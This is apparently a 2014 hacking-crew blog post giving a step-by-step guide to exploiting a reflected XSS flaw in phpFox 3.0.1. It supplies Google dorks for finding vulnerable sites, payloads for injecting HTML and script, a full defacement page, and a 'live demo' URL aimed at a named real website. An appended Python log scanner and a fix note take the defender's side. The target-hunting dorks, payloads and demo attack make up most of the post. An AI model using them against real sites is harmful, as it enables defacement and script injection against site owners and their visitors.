Monday, 10 March 2014

phpFox XSS Vulnerability








Finding Vulnerable Target

Dork: "intext:© · English (US) Powered By phpFox Version 3.0.1."
            "inurl:/static/ajax.php?core"


1- Choose any dork and paste it into Google

2- Choose any site


Exploiting Target

1- The site's URL will look like this, or something similar:

www.site.com/static/ajax.php?core[ajax]=true&core[call]=core.message&height=150&width=300&message=<div class="error_message">Error Message Here&core[security_token]=99d754d2b583565369e194e30eaabcbc  


2- Now replace the error message (the value of the message parameter) with your own HTML tags or anything you want.

To show a header
<h1>Hacked</h1>

To show a header in the center

<center><h1>Hacked</h1></center>

To show a title

<title>Hacked</title>

To add an image
<img src="http://www.black-cybersec-crew.blogspot.com'><img src="http://i1345.photobucket.com/albums/p673/Apiz_pudin/bb_zps5fa4dc8b.png"/>

To add a message
<p><b>Your Message Here</b></p>

To write a message on multiple lines
<p><b>First line<br>Second Line</b></p>

To add scrolling text
<marquee>Scrolling text Here</marquee>

To add an alert box

<script>alert("hello");</script>

To add a background colour to the page

<body bgcolor="red"/>

To add a full deface page
<title>Hacked!</title><body bgcolor=black><center><font color="white"><h2>XSSed!</h2><br><h1>./BL4CK E4GL3 W4S H3RE</h1><a href='http://www.black-cybersec-crew.blogspot.com'><marquee><img src="http://i1345.photobucket.com/albums/p673/Apiz_pudin/bb_zps5fa4dc8b.png"/></marquee>


3- The final URL will look like this:

http://www.site.com/static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=%20%3Ctitle%3EHacked!%3C/title%3E%3Cbody%20bgcolor=black%3E%3Ccenter%3E%3Cfont%20color=%22white%22%3E%3Ch2%3EXSSed!%3C/h2%3E%3Cbr%3E%3Ch1%3E./BL4CK%20E4GL3%20W4S%20H3RE%3C/h1%3E%3Ca%20href=%27http://www.black-cybersec-crew.blogspot.com%27%3E%3Cmarquee%3E%3Cimg%20src=%22http://i1345.photobucket.com/albums/p673/Apiz_pudin/bb_zps5fa4dc8b.png%22/%3E%3C/marquee%3E


Live Demo:

http://artisticdimeinc.com/static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=%20%3Ctitle%3EHacked!%3C/title%3E%3Cbody%20bgcolor=black%3E%3Ccenter%3E%3Cfont%20color=%22white%22%3E%3Ch2%3EXSSed!%3C/h2%3E%3Cbr%3E%3Ch1%3E./BL4CK%20E4GL3%20W4S%20H3RE%3C/h1%3E%3Ca%20href=%27http://www.black-cybersec-crew.blogspot.com%27%3E%3Cmarquee%3E%3Cimg%20src=%22http://i1345.photobucket.com/albums/p673/Apiz_pudin/bb_zps5fa4dc8b.png%22/%3E%3C/marquee%3E
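
A defender-side check for the request pattern shown above, as an added example that is not part of the original post: it scans web-server access log lines for core.message calls to /static/ajax.php whose message parameter carries HTML tags other than the div of the stock request. The log lines, IP addresses, the TOKEN placeholder and the div-only allowlist are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: the stock request on this page only ever carries a <div> in `message`.
ALLOWED_TAGS = {"div"}
TAG_RE = re.compile(r"<\s*/?\s*([a-zA-Z][a-zA-Z0-9]*)")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (documentation IPs, placeholder token).
BASE = "/static/ajax.php?core[ajax]=true&core[call]=core.message&height=150&width=300"
SAMPLE_LOG = [
    f'203.0.113.5 - - [10/Mar/2014:10:00:01 +0000] "GET {BASE}'
    '&message=%3Cdiv%20class=%22error_message%22%3EError%20Message%20Here'
    '&core[security_token]=TOKEN HTTP/1.1" 200 512',
    f'198.51.100.7 - - [10/Mar/2014:10:02:13 +0000] "GET {BASE}'
    '&message=%3Ch1%3EHacked%3C/h1%3E&core[security_token]=TOKEN HTTP/1.1" 200 498',
    f'198.51.100.9 - - [10/Mar/2014:10:02:40 +0000] "GET {BASE}'
    '&message=%3Cscript%3Ealert(%22hello%22)%3B%3C/script%3E HTTP/1.1" 200 530',
    '203.0.113.8 - - [10/Mar/2014:10:03:02 +0000] '
    '"GET /index.php?message=%3Cb%3Ehi%3C/b%3E HTTP/1.1" 200 2048',
]

def injected_tags(url):
    """Return sorted non-allowlisted tag names found in `message` of a core.message call."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    is_target = urlsplit(url).path.endswith("/static/ajax.php")
    if not is_target or "core.message" not in params.get("core[call]", []):
        return []
    found = set()
    for value in params.get("message", []):  # parse_qs has already URL-decoded the value
        found.update(tag.lower() for tag in TAG_RE.findall(value))
    return sorted(found - ALLOWED_TAGS)

def scan(lines):
    """Return (client_ip, tags) for every log line whose request carries unexpected markup."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        tags = injected_tags(match.group(1)) if match else []
        if tags:
            hits.append((line.split()[0], tags))
    return hits

if __name__ == "__main__":
    for ip, tags in scan(SAMPLE_LOG):
        print(ip, "non-allowlisted tags in message:", tags)
```

Log matching only shows that the endpoint is being probed; the fix is server-side, by HTML-encoding the message value before it is written into the response.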